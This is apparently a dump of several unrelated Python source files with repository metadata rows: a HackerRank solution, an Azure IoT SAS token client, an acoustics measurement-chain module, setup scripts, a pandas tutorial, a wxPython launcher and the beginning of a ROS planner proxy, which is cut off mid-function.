| 43.875 | 124 | 0.837607 | 72 | 702 | 7.791667 | 0.652778 | 0.064171 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01278 | 0.108262 | 702 | 15 | 125 | 46.8 | 0.883387 | 0.079772 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
69a258f2db5f02076d0ecb02bb0169664304388a | 1,732 | py | Python | Day 23/ViralAdvertising.py | sandeep-krishna/100DaysOfCode | af4594fb6933e4281d298fa921311ccc07295a7c | [
"MIT"
] | null | null | null | Day 23/ViralAdvertising.py | sandeep-krishna/100DaysOfCode | af4594fb6933e4281d298fa921311ccc07295a7c | [
"MIT"
] | null | null | null | Day 23/ViralAdvertising.py | sandeep-krishna/100DaysOfCode | af4594fb6933e4281d298fa921311ccc07295a7c | [
"MIT"
] | null | null | null | '''
HackerLand Enterprise is adopting a new viral advertising strategy. When they launch a new product, they advertise it to exactly 5 people on social media.
On the first day, half of those people (i.e., floor(5/2) = 2) like the advertisement and each shares it with 3 of their friends. At the beginning of the second day, 2 x 3 = 6 people receive the advertisement.
Each day, floor(recipients/2) of the recipients like the advertisement and will share it with 3 friends on the following day. Assuming nobody receives the advertisement twice, determine how many people have liked the ad by the end of a given day, beginning with launch day as day 1.
For example, assume you want to know how many have liked the ad by the end of the 5th day.

Day  Shared  Liked  Cumulative
  1       5      2           2
  2       6      3           5
  3       9      4           9
  4      12      6          15
  5      18      9          24

The cumulative number of likes is 24.

Function Description
Complete the viralAdvertising function in the editor below. It should return the cumulative number of people who have liked the ad at a given time.
viralAdvertising has the following parameter(s):
n: the integer number of days

Input Format
A single integer, n, denoting a number of days.

Output Format
Print the number of people who liked the advertisement during the first n days.

Sample Input
3

Sample Output
9
'''
#!/bin/python3

import math
import os
import random
import re
import sys


# Complete the viralAdvertising function below.
def viralAdvertising(n):
    ppl = [2]
    for i in range(n - 1):
        ppl.append(ppl[-1] * 3 // 2)
    return sum(ppl)
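
# Sanity check (added note): this matches the worked table in the problem
# statement above, i.e. viralAdvertising(3) == 9 and viralAdvertising(5) == 24.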

if __name__ == '__main__':
    fptr = open(os.environ['OUTPUT_PATH'], 'w')
    n = int(input())
    result = viralAdvertising(n)
    fptr.write(str(result) + '\n')
    fptr.close()
| 28.866667 | 261 | 0.714781 | 280 | 1,732 | 4.389286 | 0.467857 | 0.065094 | 0.029292 | 0.034174 | 0.039056 | 0.039056 | 0.039056 | 0.039056 | 0 | 0 | 0 | 0.023952 | 0.228637 | 1,732 | 59 | 262 | 29.355932 | 0.895958 | 0.789261 | 0 | 0 | 0 | 0 | 0.061798 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.3125 | 0 | 0.4375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
69aa6a9832bfa5efcd1c75e435948454112b6d04 | 4,480 | py | Python | azure-iot-device/azure/iot/device/provisioning/security/sk_security_client.py | olivakar/azure-iot-sdk-python | d8f2403030cf94510d381d8d5ac37af6e8d306f8 | [
"MIT"
] | 35 | 2018-12-01T05:42:30.000Z | 2021-03-10T12:23:41.000Z | azure-iot-device/azure/iot/device/provisioning/security/sk_security_client.py | olivakar/azure-iot-sdk-python | d8f2403030cf94510d381d8d5ac37af6e8d306f8 | [
"MIT"
] | 81 | 2018-11-20T20:01:43.000Z | 2019-09-06T23:57:17.000Z | azure-iot-device/azure/iot/device/provisioning/security/sk_security_client.py | olivakar/azure-iot-sdk-python | d8f2403030cf94510d381d8d5ac37af6e8d306f8 | [
"MIT"
] | 18 | 2019-03-19T18:53:43.000Z | 2021-01-10T09:47:24.000Z | # -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
"""This module contains a client that is responsible for providing shared access tokens that will eventually establish
the authenticity of devices to Device Provisioning Service.
"""
from azure.iot.device.common.sastoken import SasToken


class SymmetricKeySecurityClient(object):
    """
    A client that is responsible for providing shared access tokens that will eventually establish
    the authenticity of devices to Device Provisioning Service.

    :ivar provisioning_host: Host running the Device Provisioning Service.
    :ivar registration_id: The registration ID is used to uniquely identify a device in the Device Provisioning Service.
    :ivar id_scope: The ID scope is used to uniquely identify the specific provisioning service the device will
        register through.
    """

    def __init__(self, provisioning_host, registration_id, id_scope, symmetric_key):
        """
        Initialize the symmetric key security client.

        :param provisioning_host: Host running the Device Provisioning Service. Can be found in the Azure portal in the
            Overview tab as the string Global device endpoint.
        :param registration_id: The registration ID is used to uniquely identify a device in the Device Provisioning Service.
            The registration ID is an alphanumeric, lowercase string and may contain hyphens.
        :param id_scope: The ID scope is used to uniquely identify the specific provisioning service the device will
            register through. The ID scope is assigned to a Device Provisioning Service when it is created by the user,
            is generated by the service, and is immutable, guaranteeing uniqueness.
        :param symmetric_key: The key which will be used to create the shared access signature token to authenticate
            the device with the Device Provisioning Service. By default, the Device Provisioning Service creates
            new symmetric keys with a default length of 32 bytes when new enrollments are saved with the Auto-generate keys
            option enabled. Users can provide their own symmetric keys for enrollments by disabling this option and
            supplying a key between 16 bytes and 64 bytes in valid Base64 format.
        """
        self._provisioning_host = provisioning_host
        self._registration_id = registration_id
        self._id_scope = id_scope
        self._symmetric_key = symmetric_key
        self._sas_token = None

    @property
    def provisioning_host(self):
        """
        :return: Host running the Device Provisioning Service.
        """
        return self._provisioning_host

    @property
    def registration_id(self):
        """
        :return: The registration ID used to uniquely identify a device in the Device Provisioning Service.
            The registration ID is an alphanumeric, lowercase string and may contain hyphens.
        """
        return self._registration_id

    @property
    def id_scope(self):
        """
        :return: The ID scope used to uniquely identify the specific provisioning service the device registers through.
        """
        return self._id_scope

    def _create_shared_access_signature(self):
        """
        Construct SAS tokens that have a hashed signature formed using the symmetric key of this security client.
        This signature is recreated by the Device Provisioning Service to verify whether a security token presented
        during attestation is authentic or not.

        :return: A string representation of the shared access signature which is of the form
            SharedAccessSignature sig={signature}&se={expiry}&skn={policyName}&sr={URL-encoded-resourceURI}
        """
        uri = self._id_scope + "/registrations/" + self._registration_id
        key = self._symmetric_key
        time_to_live = 3600
        keyname = "registration"
        return SasToken(uri, key, keyname, time_to_live)

    def get_current_sas_token(self):
        """Return a valid SAS token string, creating it on first use and
        refreshing it on subsequent calls."""
        if self._sas_token is None:
            self._sas_token = self._create_shared_access_signature()
        else:
            self._sas_token.refresh()
        return str(self._sas_token)
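
# Usage sketch (added for illustration; all values are hypothetical):
#
#   client = SymmetricKeySecurityClient(
#       provisioning_host="global.azure-devices-provisioning.net",
#       registration_id="my-device-001",
#       id_scope="0ne000ABCDE",
#       symmetric_key="<base64-encoded key>")
#   sas = client.get_current_sas_token()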
| 50.909091 | 125 | 0.697321 | 563 | 4,480 | 5.42984 | 0.300178 | 0.093229 | 0.106313 | 0.091593 | 0.39156 | 0.388943 | 0.376186 | 0.376186 | 0.340203 | 0.340203 | 0 | 0.003456 | 0.225 | 4,480 | 87 | 126 | 51.494253 | 0.877016 | 0.665402 | 0 | 0.103448 | 0 | 0 | 0.022632 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.206897 | false | 0 | 0.034483 | 0 | 0.448276 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
69ab300f18ef0da610d86dd3cc10be0de5d8ac1c | 10,093 | py | Python | mestopy/mestopy.py | pyfar-seminar/mestopy | 5eed12b12bb58965fa70be591d774f149fcbf6e8 | [
"MIT"
] | null | null | null | mestopy/mestopy.py | pyfar-seminar/mestopy | 5eed12b12bb58965fa70be591d774f149fcbf6e8 | [
"MIT"
] | null | null | null | mestopy/mestopy.py | pyfar-seminar/mestopy | 5eed12b12bb58965fa70be591d774f149fcbf6e8 | [
"MIT"
] | null | null | null | from scipy.signal import oaconvolve
from pyfar import Signal


# Class to generate ref-objects that can be part of the MeasurementChain
class Device(object):
    """Class for a device in a MeasurementChain.

    This class holds methods and properties of a device in the
    'MeasurementChain' class. A device can be, e.g., a sound card or a
    pre-amplifier, described by a frequency response and/or a sensitivity.
    """

    def __init__(self, name, data=None, sens=1, unit=None):
        """Init Device with data.

        Attributes
        ----------
        name : str
            Name of the device.
        data : Signal, None, optional
            Signal data that represents the inversed frequency response of
            the device. The default is None; in this case a perfectly flat
            frequency response is assumed and only the sensitivity is applied
            as a factor.
            Caution: Avoid large gains in the frequency responses because
            they will boost measurement noise and might cause numerical
            instabilities. One possibility to avoid this is to use
            regularized inversion.
        sens : float, optional
            Sensitivity of the device as a factor. If neither data nor
            sens is given, add_device generates a device that has no effect on
            the measurement chain, as it has no frequency response and a
            sensitivity (factor) default of 1.
        unit : str, optional
            The physical unit of the device, e.g., mV/Pa.
        """
        self.name = name
        self.data = data
        self.sens = sens
        self.unit = unit

    @property
    def name(self):
        """The name of the device."""
        return self._name

    @name.setter
    def name(self, name):
        if not isinstance(name, str):
            raise ValueError('Device name must be string.')
        else:
            self._name = name

    @property
    def data(self):
        """The frequency dependent data representing the device."""
        return self._data

    @data.setter
    def data(self, data):
        if not isinstance(data, (Signal, type(None))):
            raise TypeError('Input data must be type Signal or None.')
        else:
            self._data = data

    @property
    def sens(self):
        """The sensitivity of the device."""
        return self._sens

    @sens.setter
    def sens(self, sens):
        if not isinstance(sens, (int, float)):
            raise ValueError('Sensitivity must be a number (int or float).')
        else:
            self._sens = sens

    @property
    def unit(self):
        """The unit of the sensitivity."""
        return self._unit

    @unit.setter
    def unit(self, unit):
        if not (isinstance(unit, str) or unit is None):
            raise ValueError('Unit of sensitivity must be string or None.')
        else:
            self._unit = unit

    @property
    def freq(self):
        """Return the inverse frequency response multiplied by the sensitivity
        as a Signal, or the sensitivity as a scalar when the device has no
        frequency response.
        """
        if self.data is not None:
            return self.data * self.sens
        else:
            return self.sens

    def __repr__(self):
        """String representation of Device class."""
        if self.data is None:
            repr_string = (
                f"{self.name} defined by "
                f"sensitivity={self.sens} unit={self.unit}\n")
        else:
            repr_string = (
                f"{self.name} defined by {self.data.n_bins} freq-bins, "
                f"sensitivity={self.sens} unit={self.unit}\n")
        return repr_string


# Class for MeasurementChain as a frame for Devices
class MeasurementChain(object):
    """Class for a complete measurement chain.

    This class holds methods and properties of all devices in the
    measurement chain. It can include a single or multiple objects of
    the Device class.
    """

    def __init__(self,
                 sampling_rate,
                 sound_device=None,
                 devices=None,
                 comment=None):
        """Init measurement chain with sampling rate.

        Attributes
        ----------
        sampling_rate : double
            Sampling rate in Hertz.
        sound_device : int
            Number to identify the sound device used. The default is None.
        devices : list
            A list of Device objects. The default is an empty list.
        comment : str
            A comment related to the measurement chain. The default is None.
        """
        self.sampling_rate = sampling_rate
        self.sound_device = sound_device
        self.comment = comment
        if isinstance(devices, type(None)):
            self.devices = []
        else:
            for dev in devices:
                if not isinstance(dev, Device):
                    raise TypeError('Input data must be type Device.')
                if dev.data is None:
                    continue
                if not dev.data.sampling_rate == self.sampling_rate:
                    raise ValueError("Sampling rate of device does not agree "
                                     "with the measurement chain.")
            self.devices = devices
        self._freq()

    def _find_device_index(self, name):
        """Private method to find the index of a given device name."""
        for i, dev in enumerate(self.devices):
            if dev.name == name:
                return i
        raise ValueError(f"device {name} not found")

    def _freq(self):
        """Private method to calculate the frequency response of the complete
        measurement chain and save it to the private attribute _resp."""
        if self.devices == []:
            resp = 1.0
        else:
            resp = [[1.0]]
            for dev in self.devices:
                if isinstance(dev.freq, Signal):
                    resp = oaconvolve(resp, dev.freq.time)
                else:
                    resp = oaconvolve(resp, [[dev.freq]])
            resp = Signal(resp, self.sampling_rate, domain='time')
            resp.domain = 'freq'
        self._resp = resp

    def add_device(self,
                   name,
                   data=None,
                   sens=1,
                   unit=None
                   ):
        """Adds a new device to the measurement chain.
        Refer to the documentation of the Device class.

        Attributes
        ----------
        name : str
        data : pyfar.Signal, optional
        sens : float, optional
        unit : str, optional
        """
        # check if data is type Signal or None
        if not isinstance(data, (Signal, type(None))):
            raise TypeError('Input data must be type Signal or None.')
        # only check the sampling rate if there are devices in the chain
        if not self.devices == []:
            # check if the sampling_rate of the new device and the
            # MeasurementChain is the same
            if data is not None:
                if not self.sampling_rate == data.sampling_rate:
                    raise ValueError("Sampling rate of the new device does "
                                     "not agree with the measurement chain.")
        # add device to chain
        new_device = Device(name, data=data,
                            sens=sens, unit=unit)
        self.devices.append(new_device)
        self._freq()

    def list_devices(self):
        """Returns a list of names of all devices in the measurement chain.
        """
        # list all ref-objects in the chain
        device_names = []
        for dev in self.devices:
            name = dev.name
            device_names.append(name)
        return device_names

    def remove_device(self, num):
        """Removes a single device from the measurement chain,
        by name or number.

        Attributes
        ----------
        num : int or str
            Identifier for the device to remove. The device can be found by
            name as string or by number in the device list as int.
        """
        # remove ref-object at chain position num
        if isinstance(num, int):
            self.devices.pop(num)
        # remove ref-object in the chain by name
        elif isinstance(num, str):
            self.remove_device(self._find_device_index(num))
        else:
            raise TypeError("device to remove must be int or str")
        self._freq()

    # reset the complete ref-object list
    def reset_devices(self):
        """Resets the list of devices in the measurement chain.
        Other global parameters such as sampling rate or sound device of the
        measurement chain remain unchanged.
        """
        self.devices = []
        self._freq()

    # get the freq-response of a specific device in the measurement chain
    def device_freq(self, num):
        """Returns the frequency response of a single device from the
        measurement chain, by name or number.

        Attributes
        ----------
        num : int or str
            Identifier for the device, can be the name as string or the
            number in the device list as int.
        """
        if isinstance(num, int):
            return self.devices[num].freq
        elif isinstance(num, str):
            return self.device_freq(self._find_device_index(num))
        else:
            raise TypeError("Device must be called by int or str.")

    # get the freq-response of the whole measurement chain as pyfar.Signal
    @property
    def freq(self):
        """Returns the frequency response of the complete measurement chain.
        All devices (frequency response and sensitivity) are considered.
        """
        return self._resp

    def __repr__(self):
        """String representation of MeasurementChain class."""
        repr_string = (
            f"measurement chain with {len(self.devices)} devices "
            f"@ {self.sampling_rate} Hz sampling rate.\n")
        for i, dev in enumerate(self.devices):
            repr_string = f"{repr_string}# {i:{2}}: {dev}"
        return repr_string
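

# Minimal usage sketch (added for illustration; all values are made up and
# pyfar is assumed to be installed):
#
#   chain = MeasurementChain(sampling_rate=44100)
#   chain.add_device('microphone', sens=0.05, unit='V/Pa')
#   chain.add_device('preamp', sens=10)
#   chain.list_devices()   # ['microphone', 'preamp']
#   response = chain.freq  # combined frequency response of the whole chain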
| 34.803448 | 83 | 0.574458 | 1,221 | 10,093 | 4.683866 | 0.164619 | 0.053156 | 0.036545 | 0.01154 | 0.273649 | 0.216996 | 0.205456 | 0.141633 | 0.088477 | 0.07239 | 0 | 0.001215 | 0.347766 | 10,093 | 289 | 84 | 34.923875 | 0.867538 | 0.377192 | 0 | 0.304636 | 1 | 0 | 0.132646 | 0.008179 | 0 | 0 | 0 | 0 | 0 | 1 | 0.139073 | false | 0 | 0.013245 | 0 | 0.251656 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
69ab8661fbcc312d7db1662206a4daeec8008df9 | 482 | py | Python | setup.py | Chichilele/algorithms | acc7470631b3ced2a8e126011af1e6ff1ff62394 | [
"MIT"
] | null | null | null | setup.py | Chichilele/algorithms | acc7470631b3ced2a8e126011af1e6ff1ff62394 | [
"MIT"
] | null | null | null | setup.py | Chichilele/algorithms | acc7470631b3ced2a8e126011af1e6ff1ff62394 | [
"MIT"
] | null | null | null | from setuptools import setup, find_packages
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name="algorithms",
version="0.1",
description="Implements a few optimisation algorithms",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/chichilele/algorithms",
packages=find_packages(),
entry_points={"console_scripts": ["root_finding=algorithms.root_finding:cli"]},
)
| 28.352941 | 83 | 0.728216 | 58 | 482 | 5.844828 | 0.706897 | 0.176991 | 0.112094 | 0.176991 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004819 | 0.139004 | 482 | 16 | 84 | 30.125 | 0.812048 | 0 | 0 | 0 | 0 | 0 | 0.354772 | 0.082988 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.076923 | 0 | 0.076923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
69ac26e95480ef9ba55d71661068918c6ae8a979 | 2,445 | py | Python | pandas_loc_iloc.py | tseth92/pandas_experiments | ab26e0c6004546bea1ebdbe8807a6d4014189e64 | [
"MIT"
] | null | null | null | pandas_loc_iloc.py | tseth92/pandas_experiments | ab26e0c6004546bea1ebdbe8807a6d4014189e64 | [
"MIT"
] | null | null | null | pandas_loc_iloc.py | tseth92/pandas_experiments | ab26e0c6004546bea1ebdbe8807a6d4014189e64 | [
"MIT"
] | null | null | null | '''
This code compares loc and iloc in a pandas dataframe.
'''
__author__ = "Tushar Seth"
__email__ = "tusharseth93@gmail.com"
import pandas as pd
import timeit
df_test = pd.DataFrame()
tlist = []
tlist2 = []
################ this code creates a dataframe df_test ##################
############### with two columns and 50 entries #########################
for i in range(0, 50):
    tlist.append(i)
    tlist2.append(i + 5)
df_test['A'] = tlist
df_test['B'] = tlist2
print('Original Dataframe:')
print(df_test.head(5))
print("-----------------")
######################### Done creating DF ##############################
############################ iloc #######################################
print('iloc dataframe: 3rd row and 1st to 2nd column:')
# since iloc ignores the last part of slice
# iloc works with only numbers for columns
print(df_test.iloc[2:3,0:2])
print("-----------------")
print('loc dataframe: 3rd row and 1st to 2nd column:')
# since loc includes the last part of slice
# loc works with only column names
print(df_test.loc[2:3,['A','B']])
print("-----------------")
######################### Done iloc ####################################
##########*******************************************####################
# ***** Observing loc and iloc when index is different ********** #
##########*******************************************####################
'''
Now the index of the dataframe is altered, which exposes the actual difference
between loc and iloc in terms of rows: iloc works by positional index,
counting from the start, whereas loc works by where the index label appears.
E.g. for index (4, 5, 6, 1, 2), iloc treats 2 as a position counted from the
start, whereas loc looks for the row whose label is 2, which sits at the 5th
position here.
'''
############################### changing index ##########################
as_list = df_test.index.tolist()
print(as_list[3:7])
as_list[0:5] = [63,64,65,66,67]
for i in range(5, len(as_list)):
    as_list[i] = as_list[i] - 5
df_test.index = as_list
########################################################################
print('-----------------Dataframe after index updated -------------- ')
print(df_test.head(10))
print('-------------- iloc dataframe with updated index-------------')
print(df_test.iloc[:7])  # iloc: the first 7 rows, counted by position
print('-------------- loc dataframe with updated index-------------')
print(df_test.loc[:7])   # loc: all rows up to and including label 7
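
# Added illustration: the same contrast on a toy Series (values are made up):
#
#   s = pd.Series(['a', 'b', 'c'], index=[10, 20, 30])
#   s.iloc[0]   # 'a'  (position 0)
#   s.loc[10]   # 'a'  (label 10)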
| 33.958333 | 73 | 0.521472 | 307 | 2,445 | 4.065147 | 0.37785 | 0.057692 | 0.052885 | 0.017628 | 0.145833 | 0.116987 | 0.116987 | 0.059295 | 0.059295 | 0 | 0 | 0.027506 | 0.122699 | 2,445 | 71 | 74 | 34.43662 | 0.554312 | 0.235992 | 0 | 0.090909 | 0 | 0 | 0.363203 | 0.045758 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.060606 | 0 | 0.060606 | 0.484848 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
69ae65d2b4f7488006dab65f0a909611be5333f5 | 2,061 | py | Python | felapps/apps/dataworkshop/dataworkshop.py | archman/felapps | 89532a592070d2a0cf07f0f2b4c723cbf1c1bd33 | [
"MIT"
] | 2 | 2018-04-01T14:37:39.000Z | 2021-03-12T04:16:12.000Z | felapps/apps/dataworkshop/dataworkshop.py | Archman/felapps | 89532a592070d2a0cf07f0f2b4c723cbf1c1bd33 | [
"MIT"
] | null | null | null | felapps/apps/dataworkshop/dataworkshop.py | Archman/felapps | 89532a592070d2a0cf07f0f2b4c723cbf1c1bd33 | [
"MIT"
] | 2 | 2016-07-10T11:14:33.000Z | 2019-07-06T05:42:10.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
DataWorkshop: application to handle data, e.g. generated from imageviewer

Author: Tong Zhang
Created: Sep. 23rd, 2015
"""

from ...utils import datautils
from ...utils import miscutils
from ...utils import funutils
from ...utils import resutils

import wx
import wx.lib.mixins.inspection as wit
import os

__version__ = miscutils.AppVersions().getVersion('dataworkshop')
__author__ = "Tong Zhang"


class InspectApp(wx.App, wit.InspectionMixin):
    def OnInit(self):
        self.Init()
        #configFile = os.path.expanduser("~/.felapps/config/imageviewer.xml")
        #if not os.path.isfile(configFile):
        #    configFile = funutils.getFileToLoad(None, ext='xml')
        myframe = datautils.DataWorkshop(None, config=None, title=u'DataWorkshop \u2014 Data Analysis Framework (debug mode, CTRL+ALT+I)', appversion=__version__, style=wx.DEFAULT_FRAME_STYLE)
        myframe.Show()
        myframe.SetIcon(resutils.dicon_s.GetIcon())
        self.SetTopWindow(myframe)
        return True


def run(maximize=True, logon=False, debug=True):
    """
    Function to make the dataworkshop app run.
    """
    if debug:
        app = InspectApp()
        app.MainLoop()
    else:
        app = wx.App(redirect=logon, filename='log')
        #configFile = os.path.expanduser("~/.felapps/config/imageviewer.xml")
        #if not os.path.isfile(configFile):
        #    configFile = funutils.getFileToLoad(None, ext='xml')
        if maximize:
            myframe = datautils.DataWorkshop(None, config=None, title=u'DataWorkshop \u2014 Data Analysis Framework', appversion=__version__, style=wx.DEFAULT_FRAME_STYLE)
        else:
            myframe = datautils.DataWorkshop(None, config=None, title=u'DataWorkshop \u2014 Data Analysis Framework', appversion=__version__, style=wx.DEFAULT_FRAME_STYLE & ~(wx.RESIZE_BORDER | wx.MAXIMIZE_BOX))
        myframe.Show()
        myframe.SetIcon(resutils.dicon_s.GetIcon())
        app.MainLoop()


if __name__ == '__main__':
    run()
| 34.35 | 212 | 0.675885 | 241 | 2,061 | 5.622407 | 0.410788 | 0.026568 | 0.04428 | 0.070849 | 0.525461 | 0.525461 | 0.525461 | 0.495203 | 0.427306 | 0.427306 | 0 | 0.011522 | 0.199903 | 2,061 | 59 | 213 | 34.932203 | 0.810188 | 0.252305 | 0 | 0.25 | 1 | 0 | 0.121774 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.21875 | 0 | 0.34375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
69b2168377003bbbd37472a46ea76cd577d96277 | 1,082 | py | Python | setup.py | ysatapathy23/TomoEncoders | 6f3f8c6dd088e4df968337e33a034a42d1f6c799 | [
"BSD-3-Clause"
] | null | null | null | setup.py | ysatapathy23/TomoEncoders | 6f3f8c6dd088e4df968337e33a034a42d1f6c799 | [
"BSD-3-Clause"
] | null | null | null | setup.py | ysatapathy23/TomoEncoders | 6f3f8c6dd088e4df968337e33a034a42d1f6c799 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
@author: atekawade
"""
from setuptools import setup, find_packages
setup(
# Needed to silence warnings (and to be a worthwhile package)
name='tomo_encoders',
url='https://github.com/aniketkt/TomoEncoders',
author='Aniket Tekawade',
author_email='atekawade@anl.gov',
# Needed to actually package something
packages=['tomo_encoders', 'tomo_encoders.neural_nets', 'tomo_encoders.misc', 'tomo_encoders.structures', 'tomo_encoders.tasks', 'tomo_encoders.rw_utils', 'tomo_encoders.reconstruction', 'tomo_encoders.labeling', 'tomo_encoders.mesh_processing'],
# Needed for dependencies
install_requires=['numpy', 'pandas', 'scipy', 'h5py', 'matplotlib', \
'opencv-python', 'scikit-image',\
'ConfigArgParse', 'tqdm', 'ipython', 'seaborn'],
version=open('VERSION').read().strip(),
license='BSD',
description='Representation learning for latent encoding of morphology in 3D tomographic images',
# long_description=open('README.md').read(),
)
| 38.642857 | 250 | 0.682994 | 121 | 1,082 | 5.966942 | 0.727273 | 0.166205 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004435 | 0.166359 | 1,082 | 27 | 251 | 40.074074 | 0.796009 | 0.212569 | 0 | 0 | 0 | 0 | 0.554361 | 0.179211 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.071429 | 0 | 0.071429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
69b54d1f2fc387e83bb92bd862115b2d1c6f2876 | 7,728 | py | Python | ROS/src/spiderplan_proxy/src/spiderplan_proxy.py | uwe-koeckemann/SpiderPlan | ae8666967ee9e4d3563c43934823f65e72f1d9ce | [
"MIT"
] | null | null | null | ROS/src/spiderplan_proxy/src/spiderplan_proxy.py | uwe-koeckemann/SpiderPlan | ae8666967ee9e4d3563c43934823f65e72f1d9ce | [
"MIT"
] | null | null | null | ROS/src/spiderplan_proxy/src/spiderplan_proxy.py | uwe-koeckemann/SpiderPlan | ae8666967ee9e4d3563c43934823f65e72f1d9ce | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#Copyright (c) 2015 Uwe Köckemann <uwe.kockemann@oru.se>
#Permission is hereby granted, free of charge, to any person obtaining
#a copy of this software and associated documentation files (the
#"Software"), to deal in the Software without restriction, including
#without limitation the rights to use, copy, modify, merge, publish,
#distribute, sublicense, and/or sell copies of the Software, and to
#permit persons to whom the Software is furnished to do so, subject to
#the following conditions:
#The above copyright notice and this permission notice shall be
#included in all copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
#EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
#MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
#NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
#LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
#OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
#WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import fileinput
import socket
import os
import signal
import sys
import time
import rospy
import actionlib
from std_msgs.msg import *
from geometry_msgs.msg import *
from actionlib_tutorials.msg import *
import ROSMessageConversion
import ROSMessageConversion as msg_conv
currentTicket = 0
nextFreeTicket = 0
lastMessage = {}
publishers = {}
publisherMsg = {}
subscriberVar = {}
nextRequestID = 0
actionClientMap = {}
someone_writing = False
def give_back_ticket():
global nextFreeTicket  # module-level counter; required for the in-place decrement
if nextFreeTicket > 0:
nextFreeTicket -= 1
# Provide callbacks with an ID:
class CallbackProvider:
def __init__(self,requestID):
self.requestID = requestID
def done_cb(self,state,data):
lastMessage[(self.requestID,"done")] = msg_conv.get_str_from_ros_msg("done", data)
def active_cb(self):
lastMessage[(self.requestID,"active")] = True
def feedback_cb(self,data):
lastMessage[(self.requestID,"feedback")] = msg_conv.get_str_from_ros_msg("feedback", data)
# Provide callbacks that know their topic name:
class SubscriberCallbackProvider:
def __init__(self,topicName):
self.topicName = topicName
def callback(self,data):
lastMessage[self.topicName] = msg_conv.get_str_from_ros_msg(subscriberVar[self.topicName],data)
def reg_simple_action_client(server_name,action_name):
print "Registering action", action_name, " at ", server_name
print rospy.get_name()
client = actionlib.SimpleActionClient(server_name, msg_conv.rosClassMap[action_name])
client.wait_for_server()
actionClientMap[(server_name,action_name)] = client
def send_goal(server_name,action_name,goal_msg_str):
global nextRequestID
cbp = CallbackProvider(nextRequestID)
nextRequestID += 1
print goal_msg_str
goal = ROSMessageConversion.create_ros_msg_from_str(goal_msg_str)[1]
client = actionClientMap[(server_name,action_name)]
